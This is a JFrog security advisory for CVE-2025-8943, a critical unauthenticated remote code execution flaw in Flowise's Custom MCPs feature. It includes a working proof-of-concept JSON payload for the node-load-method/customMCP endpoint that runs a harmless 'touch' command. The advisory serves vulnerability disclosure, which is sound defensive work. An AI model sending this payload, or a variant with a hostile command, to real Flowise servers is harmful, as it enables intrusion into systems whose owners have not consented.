< Back

JFSA-2025-001380578 - Flowise OS command remote code execution

CVE-2025-8943 | CVSS 9.8

JFrog Severity:critical

Discovered ByAssaf Levkovichof the JFrog Security Research Team

Published 14 Aug, 2025 | Last updated 14 Aug, 2025

Unsupervised OS command execution leads to remote code execution by network attackers

flowise

(,)

The Custom MCPs feature is designed to execute OS commands, for instance, using tools like npx to spin up local MCP Servers. However, Flowise's inherent authentication and authorization model is minimal and lacks role-based access controls (RBAC). Furthermore, in certain Flowise versions the default installation operates without authentication unless explicitly configured. This combination allows either unauthenticated or authenticated users to execute unsandboxed OS commands.

Send the following payload to the node-load-method/customMCP API endpoint -

{
    "inputs":
    {
        "mcpServerConfig":
        {
            "command": "touch",
            "args":
            [
                "/tmp/yofitofi"
            ]
        }
    },
    "loadMethod": "listActions"
}

No mitigations are supplied for this issue

< Back